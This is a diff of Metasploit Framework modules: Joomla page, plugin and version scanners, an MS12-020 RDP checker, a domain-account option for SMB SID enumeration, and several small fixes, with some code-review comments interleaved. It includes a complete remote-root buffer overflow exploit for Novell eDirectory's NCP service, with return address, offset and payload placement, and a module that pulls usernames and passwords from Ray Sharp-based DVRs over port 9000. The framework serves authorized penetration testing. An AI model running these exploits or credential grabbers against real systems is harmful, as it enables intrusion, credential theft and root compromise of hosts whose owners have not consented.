@@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for common pages. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + pages = [ + 'robots.txt', + 'administrator/index.php', + 'admin/', + 'index.php/using-joomla/extensions/components/users-component/registration-form', + 'index.php/component/users/?view=registration', + 'htaccess.txt' + ] + + vprint_status("#{peer} - Checking for interesting pages") + pages.each do |page| + scan_pages(tpath, page, ip) + end + + end + + def scan_pages(tpath, page, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{page}", + 'method' => 'GET', + }) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + note = "Page Found" + if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + note = "Administrator Login Page" + elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + note = "Registration Page" + end + + print_good("#{peer} - #{note}: 
#{tpath}#{page}") + + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "#{note}: #{tpath}#{page}", + :update => :unique_data + ) + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") + end + end + + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb new file mode 100755 index 0000000000..37dff56fd4 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb 
@@ -0,0 +1,175 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Plugins Scanner', + 'Description' => %q{ + This module scans a Joomla install for plugins and potential + vulnerabilities. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), + OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")]) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + vprint_status("#{peer} - Checking for interesting plugins") + res = send_request_cgi({ + 'uri' => tpath, + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |line| + papp = line.chomp + plugin_search(tpath, papp, ip, res.body.size) + end + end + + def plugin_search(tpath, papp, ip, osize) + res = send_request_cgi({ + 'uri' => "#{tpath}#{papp}", + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + nsize = res.body.size + + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") + report_note( + :host => ip, + :port => rport, + :proto => 'http', + :ntype => 'joomla_plugin', + :data => "#{tpath}#{papp}", + :update => :unique_data + ) + + if (papp =~/passwd/ and res.body =~/root/) + print_good("#{peer} - Vulnerability: Potential LFI") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'root' signature", + :risk => 1, + :confidence => 10, + :category => 'Local File Inclusion', + :description => "Joomla: Potential LFI at #{tpath}#{papp}", + :name => 'Local File Inclusion' + ) + elsif (res.body =~/SQL syntax/) + print_good("#{peer} - Vulnerability: Potential SQL Injection") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'SQL syntax' signature", + :risk => 1, + :confidence => 10, + :category => 'SQL Injection', + :description => "Joomla: Potential SQLI at #{tpath}#{papp}", + :name => 'SQL Injection' + ) + elsif (papp =~/>alert/ and res.body =~/>alert/) + print_good("#{peer} - Vulnerability: Potential XSS") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the '>alert' signature", + :risk => 1, + :confidence => 10, + :category => 'Cross Site Scripting', + :description => "Joomla: Potential XSS at #{tpath}#{papp}", + :name => 'Cross Site Scripting' + ) + elsif (papp =~/com_/) + vars = papp.split('_') + pages = vars[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => "#{tpath}index.php?option=com_#{pages}", + 'method' => 'GET' + }) + if (res1.code == 200) + print_good("#{peer} - Page: 
#{tpath}index.php?option=com_#{pages}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "Page: #{tpath}index.php?option=com_#{pages}", + :update => :unique_data + ) + else + vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + end + end + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} ip access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") + end + end + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb new file mode 100755 index 0000000000..f0ebb7cbda --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_version.rb 
@@ -0,0 +1,174 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for information about the underlying + operating system and Joomla version. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def os_fingerprint(response) + if not response.headers.has_key?('Server') + return "Unkown OS (No Server Header)" + end + + case response.headers['Server'] + when /Win32/, /\(Windows/, /IIS/ + os = "Windows" + when /Apache\// + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + return os + end + + def fingerprint(response) + case response.body + when /(.+)<\/version\/?>/i + v = $1 + out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/, + /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/, + /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/, + /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/, + /20196 2011\-01\-09 02\:40\:25Z ian/ + out = "1.6" + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /, + /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/, + /22183 2011\-09\-30 09\:04\:32Z infograf768/, + /21660 2011\-06\-23 13\:25\:32Z infograf768/ + out = "1.7" + when /Joomla! 1.5/, + /MooTools\=\{version\:\'1\.12\'\}/, + /11391 2009\-01\-04 13\:35\:50Z ian/ + out = "1.5" + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/, + /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + out = "2.5" + when /\s+ "#{tpath}#{file}", + 'method' => 'GET' + }) + + return :abort if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + os = os_fingerprint(res) + out = fingerprint(res) + return false if not out + + if(out =~ /Unknown Joomla/) + print_error("#{peer} - Unable to identify Joomla Version with #{file}") + return false + else + print_good("#{peer} - Joomla Version:#{out} from: #{file} ") + print_good("#{peer} - OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_version', + :data => out + ) + return true + end + elsif (res.code == 403) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") + end + return :abort + end + + return false + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - 
SSL error") + return :abort + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + files = [ + 'language/en-GB/en-GB.xml', + 'templates/system/css/system.css', + 'media/system/js/mootools-more.js', + 'language/en-GB/en-GB.ini', + 'htaccess.txt', + 'language/en-GB/en-GB.com_media.ini' + ] + + vprint_status("#{peer} - Checking Joomla version") + files.each do |file| + joomla_found = check_file(tpath, file, ip) + return if joomla_found == :abort + break if joomla_found + end + end + +end diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb new file mode 100644 index 0000000000..af08f4d8c0 --- /dev/null +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb 
@@ -0,0 +1,112 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Ray Sharp DVR Password Retriever', + 'Description' => %q{ + This module takes advantage of a protocol design issue with the + Ray Sharp based DVR systems. It is possible to retrieve the username and + password through the TCP service running on port 9000. Other brands using + this platform and exposing the same issue may include Swann, Lorex, + Night Owl, Zmodo, URMET, and KGuard Security. + }, + 'Author' => + [ + 'someluser', # Python script + 'hdm' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ] + ], + 'License' => MSF_LICENSE + ) + + register_options( [ Opt::RPORT(9000) ], self.class) + end + + def run_host(ip) + req = + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" + + ( "\x00" * 475 ) + + connect + sock.put(req) + + buf = "" + begin + # Pull data until the socket closes or we time out + Timeout.timeout(15) do + loop do + res = sock.get_once(-1, 1) + buf << res if res + end + end + rescue ::Timeout::Error + rescue ::EOFError + end + + disconnect + + info = "" + mac = nil + ver = nil + + creds = {} + + buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred| + # Make sure the two passwords match + next unless cred[1] == cred[2] + creds[cred[0]] = cred[1] + end + + if creds.keys.length > 0 + creds.keys.sort.each do |user| + pass = creds[user] + report_auth_info({ + :host 
=> rhost, + :port => rport, + :sname => 'dvr', + :duplicate_ok => false, + :user => user, + :pass => pass + }) + info << "(user='#{user}' pass='#{pass}') " + end + end + + # Look for MAC address + if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi + mac = $1 + end + + # Look for version + if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m + ver = $1 + end + + info << "mac=#{mac} " if mac + info << "version=#{ver} " if ver + + return unless (creds.keys.length > 0 or mac or ver) + + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info) + print_good("#{rhost}:#{rport} #{info}") + end + +end diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb new file mode 100644 index 0000000000..93dc4bc58a --- /dev/null +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb 
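Review bot: The receive loop in `run_host` never exits on its own: when `sock.get_once(-1, 1)` returns `nil` after its one-second read timeout the `loop do` simply continues, so unless the device closes the connection (`EOFError`) every host costs the full 15 seconds of `Timeout.timeout(15)` before parsing starts. If a quiet second is an acceptable end-of-response signal, `break unless res` right after the `get_once` call keeps the 15-second limit as an upper bound only; if waiting the full interval is intentional, a one-line comment saying so would stop the next reader from "fixing" it. The empty `rescue ::Timeout::Error` / `rescue ::EOFError` bodies are fine here since both are the expected ways out, but a comment naming that would make the intent explicit.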
@@ -0,0 +1,198 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS12-020 Microsoft Remote Desktop Checker', + 'Description' => %q{ + This module checks a range of hosts for the MS12-020 vulnerability. + This does not cause a DoS on the target. + }, + 'References' => + [ + [ 'CVE', '2012-0002' ], + [ 'MSB', 'MS12-020' ], + [ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ], + [ 'EDB', '18606' ], + [ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ] + ], + 'Author' => + [ + 'Royce Davis @R3dy_ ', + 'Brandon McCann @zeknox ' + ], + 'License' => MSF_LICENSE, + )) + + register_options( + [ + OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + ], self.class) + end + + def checkRdp(packet) + # code to check if RDP is open or not + vprint_status("#{peer} - Verifying RDP Protocol") + begin + # send connection + sock.put(packet) + # read packet to see if its rdp + res = sock.recv(1024) + + if res.unpack("H*").join == "0300000b06d00000123400" + return true + else + return false + end + rescue + print_error("could not connect to RHOST") + return false + end + end + + def connectionRequest() + packet = '' + + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options + return packet + end + + def report_goods + report_vuln( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'The 
MS12-020 Checker', + :vuln => 'Confirmaiton that this host is vulnerable to MS12-020', + :refs => self.references, + :exploited_at => Time.now.utc + ) + end + + def connectInitial() + packet = '' + + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData + return packet + end + + def userRequest() + packet = '' + + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents + return packet + end + + def channelRequestOne + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x01\x03\xeb" + return packet + end + + def channelRequestTwo + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x02\x03\xeb" + return packet + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + begin + # open 
connection + connect() + rescue + return + end + + # check if rdp is open + if checkRdp(connectionRequest) + + # send connectInitial + sock.put(connectInitial) + # send userRequest + sock.put(userRequest) + user1_res = sock.recv(1024) + # send 2nd userRequest + sock.put(userRequest) + user2_res = sock.recv(1024) + # send channel request one + sock.put(channelRequestOne) + channel_one_res = sock.recv(1024) + if channel_one_res.unpack("H*").to_s[16..19] == '3e00' + # vulnerable + print_good("#{peer} - Vulnerable to MS12-020") + report_goods + + # send ChannelRequestTwo - prevent bsod + sock.put(channelRequestTwo) + + # report to the database + else + vprint_error("#{peer} - Not Vulnerable") + end + + end + # close connection + disconnect() + end + +end + diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 8ffe83a4bb..346f6f04ac 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -24,12 +24,21 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Local User Enumeration (LookupSid)', - 'Description' => 'Determine what local users exist via brute force SID lookups', + 'Description' => 'Determine what users exist via brute force SID lookups. + This module can enumerate both local and domain accounts by setting + ACTION to either LOCAL or DOMAIN', 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'DefaultOptions' => { - 'DCERPC::fake_bind_multi' => false - } + 'DefaultOptions' => + { + 'DCERPC::fake_bind_multi' => false + }, + 'Actions' => + [ + ['LOCAL', { 'Description' => 'Enumerate local accounts' } ], + ['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ] + ], + 'DefaultAction' => 'LOCAL' ) register_options( 
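Review bot: `checkRdp` wraps `sock.put`/`sock.recv` in a bare `rescue` that prints `"could not connect to RHOST"`, but by then the connection has already succeeded in `run_host`; the message hides the real cause (read timeout, reset, ...), so rescue `::Rex::ConnectionError, ::Errno::ECONNRESET, ::Timeout::Error => e` explicitly and report it, `vprint_error("#{peer} - RDP check failed: #{e.class} #{e.message}")`. The vulnerability test `channel_one_res.unpack("H*").to_s[16..19] == '3e00'` depends on `Array#to_s`, which yields `["..."]` on Ruby 1.9+ but the joined string on 1.8, so the slice lands on different hex digits depending on the interpreter; take the string explicitly with `.unpack("H*").first` and re-verify the offset against a host with a known state. `user1_res` and `user2_res` are read but never used, and the `rescue return` around `connect()` in `run_host` swallows every error silently. `report_goods` passes `:vuln => 'Confirmaiton ...'` (typo); as far as I recall `report_vuln` takes its free text under `:info`, so this value may be dropped altogether — worth checking.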
@@ -206,6 +215,8 @@ class Metasploit3 < Msf::Auxiliary :groups => {} } + target_sid = host_sid if action.name =~ /LOCAL/i + target_sid = domain_sid if action.name =~ /DOMAIN/i # Brute force through a common RID range 500.upto(datastore['MaxRID'].to_i) do |rid| @@ -216,7 +227,7 @@ class Metasploit3 < Msf::Auxiliary NDR.long(1) + NDR.long(rand(0x10000000)) + NDR.long(5) + - smb_pack_sid(host_sid) + + smb_pack_sid(target_sid) + NDR.long(rid) + NDR.long(0) + NDR.long(0) + diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb new file mode 100644 index 0000000000..36b0020b42 --- /dev/null +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb 
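Review bot: `target_sid = domain_sid if action.name =~ /DOMAIN/i` feeds `smb_pack_sid(target_sid)` unguarded, so on a host where the domain SID lookup (outside this hunk) yields `nil` — a standalone machine, or the earlier query failing — `smb_pack_sid(nil)` raises rather than explaining why the DOMAIN action could not run. A guard after the two assignments, `return print_error("#{rhost} - no #{action.name} SID available") if target_sid.nil?`, makes that failure explicit. The two regex matches could also be a plain `case action.name when 'LOCAL' ... when 'DOMAIN' ... end`, since the names are fixed by the `'Actions'` list added in the first hunk. The enclosing `run_host` starts and ends outside these hunks.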
@@ -0,0 +1,133 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell eDirectory 8 Buffer Overflow', + 'Description' => %q{ + This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The + vulnerability exists in the ndsd daemon, specifically in the NCP service, while + parsing a specially crafted Keyed Object Login request. It allows remote code + execution with root privileges. + }, + 'Author' => + [ + 'David Klein', # Vulnerability Discovery + 'Gary Nilson', # Exploit + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0432'], + [ 'OSVDB', '88718'], + [ 'BID', '57038' ], + [ 'EDB', '24205' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ] + ], + 'DisclosureDate' => 'Dec 12 2012', + 'Platform' => 'linux', + 'Privileged' => true, + 'Arch' => ARCH_X86, + 'Payload' => + { + + }, + 'Targets' => + [ + [ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3', + { + 'Ret' => 0x080a4697, # jmp esi from ndsd + 'Offset' => 58 + } + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([Opt::RPORT(524),], self.class) + end + + def check + connect + sock.put(connection_request) + res = sock.get + disconnect + if res.nil? 
or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Detected + end + + def connection_request + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x17" # request_size + pkt << "\x00\x00\x00\x01" # version + pkt << "\x00\x00\x00\x00" # reply buffer size + pkt << "\x11\x11" # cmd => create service connection + pkt << "\x00" # sequence number + pkt << "\x00" # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x00" # request code + + return pkt + end + + def exploit + + connect + + print_status("Sending Service Connection Request...") + sock.put(connection_request) + res = sock.get + if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed") + end + print_good("Service Connection successful") + + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x00" # request_size (filled later) + pkt << "\x00\x00\x00\x01" # version (1) + pkt << "\x00\x00\x00\x05" # reply buffer size + pkt << "\x22\x22" # cmd + pkt << "\x01" # sequence number + pkt << res[11] # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x17" # Login Object FunctionCode (23) + pkt << "\x00\xa7" # SubFuncStrucLen + pkt << "\x18" # SubFunctionCode + pkt << "\x90\x90" # object type + pkt << "\x50" # ClientNameLen + pkt << rand_text(7) + jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string + pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to to overwrite EIP + pkt << rand_text(target['Offset'] - jmp_payload.length) + pkt << [target.ret].pack("V") + pkt << payload.encoded + + pkt[4,4] = [pkt.length].pack("N") + + print_status("Sending 
Overflow on Keyed Object Login...") + sock.put(pkt) + sock.get + disconnect + end + +end diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 623bc31c8e..af8f2e1722 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2012-5088' ], - [ 'URL', '86352' ], + [ 'OSVDB', '86352' ], [ 'BID', '56057' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 0895037634..d9c8e87e8d 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" uri = normalize_uri(target_uri.path) - uri << '/' if target_uri.path[-1,1] != '/' + uri << '/' if uri[-1,1] != '/' # Trigger the command execution bug res = send_request_cgi({ diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 107cb3dd29..f196e48619 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 7d94d5640b..bc195f03a9 100644 
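Review bot: In `check`, `res[8, 2].unpack("n")` raises NoMethodError when the service answers with fewer than 10 bytes, because `String#[]` returns nil past the end of the string; the same expression in `exploit` has the same problem, and `res[15, 1]` and `res[11]` need at least 16 bytes. Add a length test to the reply check, `if res.nil? or res.length < 16 or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0`, in both places. Since the reply validation is duplicated verbatim between `check` and `exploit`, a small private predicate such as `service_connection_ok?(res)` would keep the two in step. In `exploit` the `fail_with` on a bad reply also leaves the socket open; a `disconnect` before it, or an `ensure`, mirrors what `check` already does.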
